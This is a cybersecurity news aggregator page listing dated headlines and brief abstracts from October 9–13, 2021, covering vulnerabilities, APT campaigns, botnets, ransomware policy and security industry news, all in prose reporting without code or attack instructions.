The Johns Hopkins University School of Advanced International Studies on Wednesday announced plans to launch an advanced academic program focused on the intersection of cybersecurity, technology, intelligence and international affairs.The Hill
October 13, 2021 – Vulnerabilities
Critical Flaw in OpenSea Could Have Let Hackers Steal Cryptocurrency From Wallets Full Text
Abstract
A now-patched critical vulnerability in OpenSea, the world's largest non-fungible token (NFT) marketplace, could've been abused by malicious actors to drain cryptocurrency funds from a victim by sending a specially-crafted token, opening a new attack vector for exploitation. The findings come from cybersecurity firm Check Point Research, which began an investigation into the platform following public reports of stolen cryptocurrency wallets triggered by free airdropped NFTs. The issues were fixed in less than one hour of responsible disclosure on September 26, 2021. "Left unpatched, the vulnerabilities could allow hackers to hijack user accounts and steal entire cryptocurrency wallets by crafting malicious NFTs," Check Point researchers said. As the name indicates, NFTs are unique digital assets such as photos, videos, audio, and other items that can be sold and traded on the blockchain, using the technology as a certificate of authenticity to establish a verThe Hacker News
October 13, 2021 – Vulnerabilities
Apple silently fixed iOS zero-day without crediting the expert who reported it Full Text
Abstract
Apple has silently addressed a zero-day vulnerability that could allow attackers to gain access to sensitive user data. Apple has silently addressed a zero-day vulnerability with the release of iOS 15.0.2; the vulnerability could allow attackers to gain...Security Affairs
October 13, 2021 – Botnet
FreakOut Botnet Turns DVRs Into Monero Cryptominers Full Text
Abstract
The new Necro Python exploit targets Visual Tool DVRs used in surveillance systems.Threatpost
October 13, 2021 – Vulnerabilities
Apple silently fixes iOS zero-day, asks bug reporter to keep quiet Full Text
Abstract
Apple has silently fixed a gamed zero-day vulnerability with the release of iOS 15.0.2, on Monday, a security flaw that could let attackers gain access to sensitive user information.BleepingComputer
October 13, 2021 – APT
APT28 Launches Spearphishing Campaign Against Gmail Users: Google Warns Full Text
Abstract
Google warned against phishing attempts by APT28 impacting nearly 14,000 Gmail users, especially activists, journalists, and government officials as they are the key targets of state-sponsored hacks. However, there were no confirmed reports of compromised Gmail accounts.Cyware Alerts - Hacker News
October 13, 2021 – General
Lawmakers, security experts call for beefing up cybersecurity Full Text
Abstract
Lawmakers and national security experts said Tuesday that the U.S. needs to take bigger steps at the government level and in the private sector to guard against ransomware attacks.The Hill
October 13, 2021 – Education
[eBook] The Guide for Reducing SaaS Applications Risk for Lean IT Security Teams Full Text
Abstract
The Software-as-a-service (SaaS) industry has gone from novelty to an integral part of today's business world in just a few years. While the benefits to most organizations are clear – more efficiency, greater productivity, and accessibility – the risks that the SaaS model poses are starting to become visible. It's not an overstatement to say that most companies today run on SaaS. This poses an increasing challenge to their security teams. A new guide from XDR and SSPM provider Cynet, titled The Guide for Reducing SaaS Applications Risk for Lean IT Security Teams (download here), breaks down exactly why SaaS ecosystems are so risky, and how security teams can mitigate those dangers. Today, the average midsize company uses 185 SaaS apps. What this means is that the number of app-to-person connections has risen exponentially. Most midsize companies have nearly 4,406 touch points, creating an attack surface that requires significant resources to simply monitor. The risk of a digitalThe Hacker News
October 13, 2021 – Criminals
MyKings botnet operators already amassed at least $24 million Full Text
Abstract
The MyKings botnet (aka Smominru or DarkCloud) is still alive and continues to spread, allowing its operators to make huge amounts of money. Avast Threat Labs researchers reported that the MyKings botnet (aka Smominru or DarkCloud) is still alive and...Security Affairs
October 13, 2021 – Malware
Brizy WordPress Plugin Exploit Chains Allow Full Site Takeovers Full Text
Abstract
A stored XSS and arbitrary file-upload bug can be paired with an authorization bypass to wreak havoc.Threatpost
October 13, 2021 – Government
Australia to tackle ransomware data breaches by deleting stolen files Full Text
Abstract
Australia's Minister for Home Affairs has announced the "Australian Government's Ransomware Action Plan," which is a set of new measures the country will adopt in an attempt to tackle the rising threat.BleepingComputer
October 13, 2021 – Vulnerabilities
Two Flaws in Apache Servers are Under Attack Full Text
Abstract
Apache, the open-source cross-platform web server software, rolled out patches to fix two security vulnerabilities that were being abused by criminals. While the first flaw can be exploited for RCE, the other, moderate flaw can enable DoS attacks on the server. Experts recommend following proper pat ...Cyware Alerts - Hacker News
October 13, 2021 – Government
World leaders call for enhanced cooperation to fight escalating wave of ransomware attacks Full Text
Abstract
A coalition of leaders from around 30 nations kicked off a White House-led summit on countering ransomware attacks Wednesday by calling for increased international cooperation to fight these incidents.The Hill
October 13, 2021 – Denial Of Service
Dutch police warn customers of a popular DDoS booter service Full Text
Abstract
Dutch police are warning customers of a distributed denial-of-service (DDoS) booter website to stop using the service in order to avoid prosecution. Dutch police warn customers of a booter service, abused to carry out distributed denial-of-service (DDoS) attacks, to stop...Security Affairs
October 13, 2021 – General
Mandating a Zero-Trust Approach for Software Supply Chains Full Text
Abstract
Sounil Yu, CISO at JupiterOne, discusses software bills of materials (SBOMs) and the need for a shift in thinking about securing software supply chains.Threatpost
October 13, 2021 – Attack
Verizon digital carrier Visible customer accounts were hacked Full Text
Abstract
Visible, a US digital wireless carrier owned by Verizon, admitted that some customer accounts were hacked after dealing with technical problems in the past couple of days.BleepingComputer
October 13, 2021 – Insider Threat
Former Executive Accessed PHI of Nearly 38,000 Individuals Full Text
Abstract
A compromise of sensitive health information at Premier Patient Healthcare affecting nearly 38,000 individuals was discovered nearly a year after a terminated company executive accessed the data.Gov Info Security
October 13, 2021 – Government
Russia excluded from virtual White House meeting on ransomware Full Text
Abstract
The White House on Wednesday will convene a virtual meeting on countering ransomware with senior officials representing 30 countries and the European Union, Biden administration officials said, as part of President Biden’s effort to work with global partners to address cyber threats.The Hill
October 13, 2021 – Phishing
Crooks use math symbols to evade anti-phishing solutions Full Text
Abstract
Threat actors are using mathematical symbols on impersonated company logos to evade detection in phishing campaigns. Researchers from anti-phishing cybersecurity firm INKY have detailed a new technique to evade detection in phishing attacks, it leverages...Security Affairs
October 13, 2021 – Vulnerabilities
OpenSea NFT platform bugs let hackers steal crypto wallets Full Text
Abstract
Security researchers found that an attacker could leave OpenSea account owners with an empty cryptocurrency balance by luring them to click on malicious NFT art.BleepingComputer
October 13, 2021 – Government
UK Cybersecurity Agency Releases New BYOD Guidance Full Text
Abstract
The United Kingdom's National Cyber Security Center has published an updated guidance for employees using their personal devices for work, amid a prolonged work-from-home setting.Info Risk Today
October 13, 2021 – Government
Russia and China left out of global anti-ransomware meetings Full Text
Abstract
The White House National Security Council facilitates virtual meetings this week with senior officials and ministers from more than 30 countries in a virtual international counter-ransomware event to rally allies in the fight against the ransomware threat.BleepingComputer
October 13, 2021 – Vulnerabilities
Siemens and Schneider Electric Address Over 50 Vulnerabilities for Patch Tuesday Full Text
Abstract
Industrial giants Siemens and Schneider Electric on Tuesday released nearly a dozen security advisories describing a total of more than 50 vulnerabilities affecting their products.Security Week
October 13, 2021 – Business
MITRE launches two organizations to protect critical infrastructure and clinical health data Full Text
Abstract
MITRE has created two new organizations intended to help the company better focus on cybersecurity threats to critical infrastructure and new approaches to public health challenges.Help Net Security
October 13, 2021 – APT
Chinese APT IronHusky uses Win zero-day in recent wave of attacks Full Text
Abstract
A Chinese-speaking hacking group exploited a Windows zero-day vulnerability in a wave of attacks on defense and IT businesses. A Chinese-speaking hacking group exploited a zero-day vulnerability in the Windows Win32k kernel driver to deploy a new remote...Security Affairs
October 12, 2021 – Denial Of Service
Dutch police send warning letters to DDoS booter customers Full Text
Abstract
Dutch authorities gave a final warning to more than a dozen customers of a distributed denial-of-service (DDoS) website, letting them know that continued cyber offenses will lead to prosecution.BleepingComputer
October 12, 2021 – APT
New Iranian APT Targets Aerospace and Telecoms in Western Countries Full Text
Abstract
A cyberespionage operation by MalKamak, an Iran-based hacker group, is targeting aerospace and telecom firms based in the Middle East, Russia, the U.S., and Europe. MalKamak, which uses the ShellClient RAT, has targeted only a small number of targets since its alleged inception in 2018. Security team ...Cyware Alerts - Hacker News
October 12, 2021 – Business
Google creates cybersecurity team to respond to increased hacks Full Text
Abstract
Google on Tuesday announced the creation of a new cybersecurity team to help respond to attacks against governments and other critical groups, along with a new program to help strengthen the cybersecurity of businesses.The Hill
October 12, 2021 – Vulnerabilities
Update Your Windows PCs Immediately to Patch New 0-Day Under Active Attack Full Text
Abstract
Microsoft on Tuesday rolled out security patches to contain a total of 71 vulnerabilities in Microsoft Windows and other software, including a fix for an actively exploited privilege escalation vulnerability that could be exploited in conjunction with remote code execution bugs to take control over vulnerable systems. Two of the addressed security flaws are rated Critical, 68 are rated Important, and one is rated Low in severity, with three of the issues listed as publicly known at the time of the release. The four zero-days are as follows — CVE-2021-40449 (CVSS score: 7.8), Win32k Elevation of Privilege Vulnerability; CVE-2021-41335 (CVSS score: 7.8), Windows Kernel Elevation of Privilege Vulnerability; CVE-2021-40469 (CVSS score: 7.2), Windows DNS Server Remote Code Execution Vulnerability; and CVE-2021-41338 (CVSS score: 5.5), Windows AppContainer Firewall Rules Security Feature Bypass Vulnerability. At the top of the list is CVE-2021-40449, a use-after-free vulnerabilityThe Hacker News
October 12, 2021 – Privacy
Office 365 Spy Campaign Targets US Military Defense Full Text
Abstract
An Iran-linked group is taking aim at makers of drones and satellites, Persian Gulf ports and maritime shipping companies, among others.Threatpost
October 12, 2021 – Hacker
Chinese hackers use Windows zero-day to attack defense, IT firms Full Text
Abstract
A Chinese-speaking hacking group exploited a zero-day vulnerability in the Windows Win32k kernel driver to deploy a previously unknown remote access trojan (RAT).BleepingComputer
October 12, 2021 – Malware
There is Lot More About Fake iTerm2 Apps than Thought Earlier Full Text
Abstract
Trend Micro sheds light on the ZuRu malware campaign that collects private data from a victim's machine. Further analysis of the fake iTerm2 app's Apple Distribution certificate led to the discovery of more trojanized apps on VirusTotal. Stay vigilant while downloading software online from untrus ...Cyware Alerts - Hacker News
October 12, 2021 – Government
Congress looks to strengthen government’s aging cyber infrastructure Full Text
Abstract
Congress is working to funnel resources to beef up state and local government cybersecurity infrastructure after the COVID-19 pandemic forced municipalities to move many essential operations to aging and vulnerable online sources.The Hill
October 12, 2021 – Vulnerabilities
Digital Signature Spoofing Flaws Uncovered in OpenOffice and LibreOffice Full Text
Abstract
The maintainers of LibreOffice and OpenOffice have shipped security updates to their productivity software to remediate multiple vulnerabilities that could be weaponized by malicious actors to alter documents to make them appear as if they are digitally signed by a trusted source. The list of the three flaws is as follows — CVE-2021-41830 / CVE-2021-25633, Content and Macro Manipulation with Double Certificate Attack; CVE-2021-41831 / CVE-2021-25634, Timestamp Manipulation with Signature Wrapping; and CVE-2021-41832 / CVE-2021-25635, Content Manipulation with Certificate Validation Attack. Successful exploitation of the vulnerabilities could permit an attacker to manipulate the timestamp of signed ODF documents, and worse, alter the contents of a document or self-sign a document with an untrusted signature, which is then tweaked to change the signature algorithm to an invalid or unknown algorithm. In both the latter two attack scenarios — stemming as a result oThe Hacker News
October 12, 2021 – Botnet
Necro botnet now targets Visual Tools DVRs Full Text
Abstract
The FreakOut (aka Necro, N3Cr0m0rPh) Python botnet is evolving; it now includes a recently published PoC exploit for Visual Tools DVR. Operators behind the FreakOut (aka Necro, N3Cr0m0rPh) Python botnet have added a PoC exploit for Visual Tools DVR,...Security Affairs
October 12, 2021 – Vulnerabilities
PyPI removes ‘mitmproxy2’ over code execution concerns Full Text
Abstract
The PyPI repository has removed a Python package called 'mitmproxy2' that was an identical copy of the official "mitmproxy" library, but with an "artificially introduced" code execution vulnerability. The 'mitmproxy' Python package is a free and open-source interactive HTTPS proxy.BleepingComputer
October 12, 2021 – Malware
New UEFI Bootkit Performs Espionage Full Text
Abstract
A new ESPecter bootkit was uncovered that performs cyberespionage and compromises system partitions. There are signs in the malware's components that revealed that the attackers could be Chinese-speaking. For protection, experts suggest applying security patches quickly.Cyware Alerts - Hacker News
October 12, 2021 – Vulnerabilities
GitHub Revoked Insecure SSH Keys Generated by a Popular git Client Full Text
Abstract
Code hosting platform GitHub has revoked weak SSH authentication keys that were generated via the GitKraken git GUI client due to a vulnerability in a third-party library that increased the likelihood of duplicated SSH keys. As an added precautionary measure, the Microsoft-owned company also said it's building safeguards to prevent vulnerable versions of GitKraken from adding newly generated weak keys. The problematic dependency, called "keypair," is an open-source SSH key generation library that allows users to create RSA keys for authentication-related purposes. It has been found to impact GitKraken versions 7.6.x, 7.7.x, and 8.0.0, released between May 12, 2021, and September 27, 2021. The flaw — tracked as CVE-2021-41117 (CVSS score: 8.7) — concerns a bug in the pseudo-random number generator used by the library, resulting in the creation of a weaker form of public SSH keys, which, owing to their low entropy — i.e., the measure of randomness — could boostThe Hacker News
October 12, 2021 – Vulnerabilities
Adobe addresses four critical flaws in its products Full Text
Abstract
Adobe addressed ten vulnerabilities across its Acrobat and Reader, Connect, Commerce, and Campaign Standard products. Adobe has released security updates to address ten vulnerabilities across its Acrobat and Reader, Connect, Commerce, and Campaign...Security Affairs
October 12, 2021 – Vulnerabilities
Microsoft October 2021 Patch Tuesday fixes 4 zero-days, 71 flaws Full Text
Abstract
Today is Microsoft's October 2021 Patch Tuesday, and with it comes fixes for four zero-day vulnerabilities and a total of 74 flaws.BleepingComputer
October 12, 2021 – APT
Research Links Multiple Attack Campaigns to APT41 Group Full Text
Abstract
Blackberry revealed three phishing schemes by APT41 that were targeting multiple sectors in India using COVID-19-themed phishing baits. Some of the phishing emails included information related to the latest income tax legislation targeting residents not living in India. Security teams need to ... Cyware Alerts - Hacker News
October 12, 2021 – Denial Of Service
Microsoft Fended Off a Record 2.4 Tbps DDoS Attack Targeting Azure Customers Full Text
Abstract
Microsoft on Monday revealed that its Azure cloud platform mitigated a 2.4 Tbps distributed denial-of-service (DDoS) attack in the last week of August targeting an unnamed customer in Europe, surpassing a 2.3 Tbps attack stopped by Amazon Web Services in February 2020. "This is 140 percent higher than 2020's 1 Tbps attack and higher than any network volumetric event previously detected on Azure," Amir Dahan, senior program manager for Azure Networking, said in a post, calling it a "UDP reflection" lasting for about 10 minutes. Reflected amplification attacks are a type of denial-of-service attack in which a threat actor takes advantage of the connectionless nature of the UDP protocol, sending spoofed requests so as to overwhelm a target server or network with a flood of packets, causing disruption or rendering the server and its surrounding infrastructure unavailable. The attack is said to have originated from a botnet of approximately 70,000 compromised dThe Hacker News
October 12, 2021 – Outage
Olympus US was forced to take down computer systems due to cyberattack Full Text
Abstract
Olympus US was forced to take down IT systems in the American region (U.S., Canada, and Latin America) following a cyberattack. The medical technology giant Olympus was forced to shut down its computer network in America (U.S., Canada, and Latin...Security Affairs
October 12, 2021 – Botnet
FreakOut botnet now attacks vulnerable video DVR devices Full Text
Abstract
A new update to the FreakOut (aka Necro, N3Cr0m0rPh) Python botnet has added a recently published PoC exploit for Visual Tools DVR in its arsenal to further aid in breaching systems.BleepingComputer
October 12, 2021 – General
Ransomware cost US companies almost $21 billion in downtime in 2020 Full Text
Abstract
An analysis by Comparitech of 186 successful ransomware attacks against businesses in the United States in 2020 has shown that the companies lost almost US$21 billion due to attack-induced downtime.ESET Security
October 12, 2021 – Vulnerabilities
GitKraken flaw led to the generation of weak SSH keys Full Text
Abstract
The GitKraken team fixed a flaw in its Git GUI client that led to the generation of weak SSH keys; users are advised to revoke and renew their keys. The development team behind the Git GUI client GitKraken has fixed a vulnerability that was leading to the generation...Security Affairs
October 12, 2021 – Outage
Cyberattack shuts down Ecuador’s largest bank, Banco Pichincha Full Text
Abstract
Ecuador's largest private bank, Banco Pichincha, has suffered a cyberattack that disrupted operations and took its ATMs and online banking portal offline.BleepingComputer
October 12, 2021 – Vulnerabilities
InHand Router Flaws Could Expose Many Industrial Companies to Remote Attacks Full Text
Abstract
Several serious vulnerabilities discovered by researchers in industrial routers made by InHand Networks could expose many organizations to remote attacks, and patches do not appear to be available.Security Week
October 12, 2021 – Denial Of Service
Microsoft mitigated a record 2.4 Tbps DDoS attack in August Full Text
Abstract
The Microsoft Azure cloud service mitigated a massive DDoS attack of 2.4 terabytes per second (Tbps) at the end of August; it is the largest DDoS attack to date. Microsoft announced that its Azure cloud service mitigated a 2.4 terabytes per second (Tbps)...Security Affairs
October 12, 2021 – Privacy
Study reveals Android phones constantly snoop on their users Full Text
Abstract
A new study by a team of university researchers in the UK has unveiled a host of privacy issues that arise from using Android smartphones.BleepingComputer
October 12, 2021 – General
Inside Apple: How macOS attacks are evolving Full Text
Abstract
Transparency, Consent, and Control (TCC) is a system for requiring user consent to access certain data, via prompts confirming that the user is okay with an app accessing that data.Malwarebytes Labs
October 12, 2021 – Hacker
SnapMC hackers skip file encryption and just steal your files Full Text
Abstract
A new actor tracked as SnapMC has emerged in the cybercrime space, performing the typical data-stealing extortion that underpins ransomware operations, but without doing any file encryption.BleepingComputer
October 12, 2021 – Vulnerabilities
Vulnerabilities Expose exacqVision Video Surveillance Systems to Remote Attacks Full Text
Abstract
Researchers at Tenable discovered critical and high-severity vulnerabilities in video surveillance systems made by Exacq Technologies, which is owned by building technology giant Johnson Controls.Security Week
October 12, 2021 – Vulnerabilities
Microsoft revokes insecure SSH keys for Azure DevOps customers Full Text
Abstract
Microsoft revoked insecure SSH keys that some Azure DevOps customers generated using a GitKraken git GUI client version impacted by an underlying issue found in one of its dependencies.BleepingComputer
October 12, 2021 – Business
Forcepoint To Acquire Cloud Security Startup Bitglass Full Text
Abstract
Forcepoint said it has reached a deal to acquire cloud security startup Bitglass. The deal is expected to close later this year. The financial terms of the deal were not disclosed.CRN
October 12, 2021 – Attack
Olympus US systems hit by cyberattack over the weekend Full Text
Abstract
Olympus, a leading medical technology company, was forced to take down IT systems in the Americas (U.S., Canada and Latin America) following a cyberattack that hit its network Sunday, on October 10, 2021.BleepingComputer
October 12, 2021 – Denial Of Service
Microsoft: Azure customer hit by record DDoS attack in August Full Text
Abstract
Microsoft has mitigated a record 2.4 Tbps (terabits per second) Distributed Denial-of-Service (DDoS) attack targeting a European Azure customer during the last week of August.BleepingComputer
October 12, 2021 – Malware
Photo editor Android app STILL sitting on Google Play store is malware Full Text
Abstract
An Android app sitting on the Google Play store touts itself to be a photo editor app. But, it contains code that steals the user's Facebook credentials to potentially run ad campaigns on the user's behalf, with their payment information. The app has scored over 5K installs, with similar spyware apps having 500K+ installs.BleepingComputer
October 12, 2021 – Government
NSA warns of wildcard certificate risks, provides mitigations Full Text
Abstract
The U.S. National Security Agency (NSA) is warning of the dangers stemming from the use of broadly-scoped certificates to authenticate multiple servers in an organization. These include a recently disclosed ALPACA technique that could be used for various traffic redirect attacks.BleepingComputer
October 11, 2021 – Hacker
Microsoft Warns of Iran-Linked Hackers Targeting US and Israeli Defense Firms Full Text
Abstract
An emerging threat actor likely supporting Iranian national interests has been behind a password spraying campaign targeting US, EU, and Israeli defense technology companies, with additional activity observed against regional ports of entry in the Persian Gulf as well as maritime and cargo transportation companies focused in the Middle East. Microsoft is tracking the hacking crew under the moniker DEV-0343. The intrusions, which were first observed in late July 2021, are believed to have targeted more than 250 Office 365 tenants, fewer than 20 of which were successfully compromised following a password spray attack — a type of brute force attack wherein the same password is cycled against different usernames to log into an application or a network in an effort to avoid account lockouts. Indications thus far allude to the possibility that the activity is part of an intellectual property theft campaign aimed at government partners producing military-grade radars, drone technologyThe Hacker News
October 11, 2021 – Botnet
Ukraine Arrests Operator of DDoS Botnet with 100,000 Compromised Devices Full Text
Abstract
Ukrainian law enforcement authorities on Monday disclosed the arrest of a hacker responsible for the creation and management of a "powerful botnet" consisting of over 100,000 enslaved devices that was used to carry out distributed denial-of-service (DDoS) and spam attacks on behalf of paid customers. The unnamed individual, from the Ivano-Frankivsk region of the country, is also said to have leveraged the automated network to detect vulnerabilities in websites and break into them as well as stage brute-force attacks in order to guess email passwords. The Ukrainian police agency said it conducted a raid of the suspect's residence and seized their computer equipment as evidence of illegal activity. "He looked for customers on the closed forums and Telegram chats and payments were made via blocked electronic payment systems," the Security Service of Ukraine (SSU) said in a press statement. The payments were facilitated via WebMoney, a Russian money transfer pThe Hacker News
October 11, 2021 – Vulnerabilities
Apple Releases Urgent iPhone and iPad Updates to Patch New Zero-Day Vulnerability Full Text
Abstract
Apple on Monday released a security update for iOS and iPadOS to address a critical vulnerability that it says is being exploited in the wild, making it the 17th zero-day flaw the company has addressed in its products since the start of the year. The weakness, assigned the identifier CVE-2021-30883, concerns a memory corruption issue in the "IOMobileFrameBuffer" component that could allow an application to execute arbitrary code with kernel privileges. Crediting an anonymous researcher for reporting the vulnerability, Apple said it's "aware of a report that this issue may have been actively exploited." Technical specifics about the flaw and the nature of the attacks remain unavailable as yet, as is the identity of the threat actor, so as to allow a majority of the users to apply the patch and prevent other adversaries from weaponizing the vulnerability. The iPhone maker said it addressed the issue with improved memory handling. Security researcher SaarThe Hacker News
October 11, 2021 – Vulnerabilities
GitHub revokes duplicate SSH auth keys linked to library bug Full Text
Abstract
GitHub has revoked weak SSH authentication keys generated using a library that incorrectly created duplicate RSA keypairs.BleepingComputer
October 11, 2021 – Criminals
When criminals go corporate: Ransomware-as-a-service Full Text
Abstract
In many cases, the groups work on an affiliate model, with the developers taking a cut of the ransom on top of the monthly payment, generally to the tune of around 20 to 50 percent.The Register
October 11, 2021 – Hacker
Microsoft reports Iranian hackers targeting US, Israeli defense companies Full Text
Abstract
Microsoft on Monday released evidence showing Iranian-linked hackers targeting and at times compromising systems of U.S. and Israeli defense technology companies.The Hill
October 11, 2021 – Education
Verify End-Users at the Helpdesk to Prevent Social Engineering Cyber Attack Full Text
Abstract
Although organizations commonly go to great lengths to address security vulnerabilities that may exist within their IT infrastructure, an organization's helpdesk might pose a bigger threat due to social engineering attacks. Social engineering is "the art of manipulating people so they give up confidential information," according to Webroot. There are many different types of social engineering schemes, but one area of vulnerability is how social engineering might be used against a helpdesk technician to steal a user's credentials. The Process of Gaining Access With Social Engineering: The first step in such an attack is usually for the attacker to gather information about the organization that they are targeting. The attacker might start by using information that is freely available on the Internet to figure out who within the organization is most likely to have elevated permissions or access to sensitive information. An attacker can often get this informationThe Hacker News
October 11, 2021 – Vulnerabilities
Apple released emergency update to fix zero-day actively exploited Full Text
Abstract
Apple released emergency updates for both iOS and iPadOS to address a zero-day flaw that is actively exploited in the wild. Apple has released iOS 15.0.2 and iPadOS 15.0.2 to address a zero-day flaw, tracked as CVE-2021-30883, that is actively exploited...Security Affairs
October 11, 2021 – Vulnerabilities
Emergency Apple iOS 15.0.2 update fixes zero-day used in attacks Full Text
Abstract
Apple has released iOS 15.0.2 and iPadOS 15.0.2 to fix a zero-day vulnerability that is actively exploited in the wild in attacks targeting iPhones and iPads.BleepingComputer
October 11, 2021 – Phishing
Verizon Phishing Scam Targets Customers Through a Text Message Full Text
Abstract
Cybercriminals behind this scam ask subscribers to provide their personal information. If they fall for this trap, their Social Security number, bank account number, and other information could be stolen.Tech Times
October 11, 2021 – Government
Former Pentagon official says China has won artificial intelligence battle Full Text
Abstract
The Pentagon's former software chief resigned and said that China is headed toward global dominance in artificial intelligence due to the relatively slow pace of innovation in the United States.The Hill
October 11, 2021 – Privacy
Indian-Made Mobile Spyware Targeted Human Rights Activist in Togo Full Text
Abstract
A prominent Togolese human rights defender has been targeted with spyware by a threat actor known for striking victims in South Asia, marking the hacking group's first foray into digital surveillance in Africa. Amnesty International tied the covert attack campaign to a collective tracked as "Donot Team" (aka APT-C-35), which has been linked to cyber offensives in India and Pakistan, while also identifying apparent evidence coupling the group's infrastructure to an Indian company called Innefu Labs. The unnamed activist is believed to have been targeted over a period of two months starting in December 2019 with the help of fake Android applications and spyware-loaded emails. "The persistent attacks over WhatsApp and email tried to trick the victim into installing a malicious application that masqueraded as a secure chat application," Amnesty International said in a report published last week. "The application was in fact a piece of custom Android spywaThe Hacker News
October 11, 2021 – Botnet
Security Service of Ukraine arrested a man operating a huge DDoS botnet Full Text
Abstract
Ukrainian police arrested a cybercriminal who controlled a botnet composed of 100,000 devices that was available for rent to launch DDoS attacks. Security Service of Ukraine (SSU) has arrested a hacker who controlled a DDoS botnet composed of 100,000...Security Affairs
October 11, 2021 – Vulnerabilities
LibreOffice, OpenOffice bug allows hackers to spoof signed docs Full Text
Abstract
LibreOffice and OpenOffice have pushed updates to address a vulnerability that makes it possible for an attacker to manipulate documents to appear as signed by a trusted source.BleepingComputer
October 11, 2021 – Business
Wiz raises $250 mln, values Israeli cyber firm at $6 bln Full Text
Abstract
Wiz said that most of its previous investors -- Sequoia Capital, Index Ventures, Insight Partners, Greenoaks, Salesforce, CyberStarts, Bernard Arnault, and Howard Schultz -- participated in the round.Reuters
October 11, 2021 – General
Majority of Americans concerned about cyberattacks on critical groups: poll Full Text
Abstract
The vast majority of Americans are concerned about cyberattacks on critical groups, in particular those in the financial and national security sectors, a poll released Monday found.The Hill
October 11, 2021 – APT
Iran-linked DEV-0343 APT target US and Israeli defense technology firms Full Text
Abstract
DEV-0343: Iran-linked threat actors are targeting US and Israeli defense technology companies leveraging password spraying attacks. Researchers at Microsoft Threat Intelligence Center (MSTIC) and Microsoft Digital Security Unit (DSU) uncovered a malicious...Security Affairs
October 11, 2021 – Hacker
Microsoft: Iran-linked hackers target US defense tech companies Full Text
Abstract
Iran-linked threat actors are targeting the Office 365 tenants of US and Israeli defense technology companies in extensive password spraying attacks.BleepingComputer
October 11, 2021 – Breach
Oregon Eye Specialists discloses data breach following employee email compromise Full Text
Abstract
The exposed data likely includes customers’ names, dates of birth, dates of service, medical record numbers, financial account information, and health insurance provider names and/or policy numbers.The Daily Swig
October 11, 2021 – Vulnerabilities
Improper Certificate Validation issue in LibreOffice and OpenOffice allows signed docs spoofing Full Text
Abstract
LibreOffice and OpenOffice released security updates to address a vulnerability that can be exploited by an attacker to spoof signed documents. LibreOffice and OpenOffice released security updates to address a moderate-severity flaw that...Security Affairs
October 11, 2021 – 5G
ZTE widens bug bounty to focus on 5G security Full Text
Abstract
ZTE has widened a bug bounty scheme to plug security vulnerabilities in its products, especially potential holes brought about by the launch of commercial 5G networks and services.ZDNet
October 11, 2021 – Privacy
Donot Team targets a Togo prominent activist with Indian-made spyware Full Text
Abstract
A Togolese human rights advocate was hit by mobile spyware that has been allegedly developed by an Indian firm called Innefu Labs. Researchers from Amnesty International have uncovered a cyberespionage campaign tracked as 'Donot Team' (aka APT-C-35)...Security Affairs
October 11, 2021 – Cryptocurrency
Huawei Cloud targeted by updated cryptomining malware Full Text
Abstract
A new version of a 2020 crypto-mining malware that was previously targeting Docker containers has now been spotted focusing on new cloud service providers like the Huawei Cloud.BleepingComputer
October 11, 2021 – General
Cyberattacks Concerning to Most in US: Pearson/AP-NORC Poll Full Text
Abstract
Most Americans across party lines have serious concerns about cyberattacks on U.S. computer systems and view China and Russia as major threats, according to a newly released poll.Security Week
October 11, 2021 – Education
NSA explains how to avoid dangers of Wildcard TLS Certificates and ALPACA attacks Full Text
Abstract
The NSA issued a technical advisory to warn organizations against the use of wildcard TLS certificates and the new ALPACA TLS attack. The National Security Agency (NSA) is warning organizations against the use of wildcard TLS certificates and the new ALPACA...Security Affairs
October 11, 2021 – Denial Of Service
Ukrainian police arrest DDoS operator controlling 100,000 bots Full Text
Abstract
Ukrainian police have arrested a hacker who controlled a 100,000 device botnet used to perform DDoS attacks on behalf of paid customers.BleepingComputer
October 11, 2021 – Solution
Microsoft Defender for Identity to detect Windows Bronze Bit attacks Full Text
Abstract
Microsoft is working on adding Bronze Bit attack detection to Microsoft Defender for Identity to make it easier for Security Operations teams to detect attempts to abuse a Windows Kerberos bug tracked as CVE-2020-17049.BleepingComputer
October 11, 2021 – Insider Threat
Nuclear engineer’s espionage plans unraveled by undercover FBI agent Full Text
Abstract
A Navy nuclear engineer and his wife were arrested under espionage-related charges alleging violations of the Atomic Energy Act after selling restricted nuclear-powered warship design data to a person they believed was a foreign power agent.BleepingComputer
October 11, 2021 – Attack
Pacific City Bank discloses ransomware attack claimed by AvosLocker Full Text
Abstract
Pacific City Bank (PCB), one of the largest Korean-American community banking service providers in America, has disclosed a ransomware incident that took place last month.BleepingComputer
October 10, 2021 – Malware
FontOnLake malware infects Linux systems via trojanized utilities Full Text
Abstract
A newly discovered malware family has been infecting Linux systems concealed in legitimate binaries. Dubbed FontOnLake, the threat delivers backdoor and rootkit components.BleepingComputer
October 10, 2021 – Vulnerabilities
Medtronic recalls some controllers used with some of its insulin pumps over cyberattack risks Full Text
Abstract
Medical device maker Medtronic recalled the remote controllers used with some of its insulin pumps because of dangerous vulnerabilities. Medical device maker Medtronic has recalled the remote controllers used with some of its insulin pumps because...Security Affairs
October 10, 2021 – Privacy
Amnesty International links cybersecurity firm to spyware operation Full Text
Abstract
A report by Amnesty International links an Indian cybersecurity company to an Android spyware program used to target prominent activists.BleepingComputer
October 10, 2021 – General
Security Affairs newsletter Round 335 Full Text
Abstract
A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs are delivered free to your inbox. If you also want to receive the international press for free, subscribe here. Previously...Security Affairs
October 10, 2021 – Attack
Previously undetected FontOnLake Linux malware used in targeted attacks Full Text
Abstract
ESET researchers spotted a previously unknown, modular Linux malware, dubbed FontOnLake, that has been employed in targeted attacks. ESET researchers spotted a previously unknown, modular Linux malware, dubbed FontOnLake, that was employed in targeted...Security Affairs
October 09, 2021 – Insider Threat
Bank of America insider charged with money laundering for BEC scams Full Text
Abstract
The U.S. District Court for the Eastern District of Virginia has charged three men with money laundering and aggravated identity theft after allegedly conducting a business email compromise (BEC) scheme.BleepingComputer
October 09, 2021 – Solution
Microsoft adds tamper protection to Windows 11 security baseline Full Text
Abstract
Microsoft has released the final version of its security configuration baseline settings for Windows 11, downloadable today using the Microsoft Security Compliance Toolkit.BleepingComputer
October 9, 2021 – Vulnerabilities
Google addresses four high-severity flaws in Chrome Full Text
Abstract
Google has addressed a total of four high-severity vulnerabilities in the Chrome version for Windows, Mac, and Linux. Google released security updates to address a total of four high-severity vulnerabilities in the Chrome version for Windows, Mac,...Security Affairs
October 9, 2021 – APT
Google Says Russian APT Targeting Journalists, Politicians Full Text
Abstract
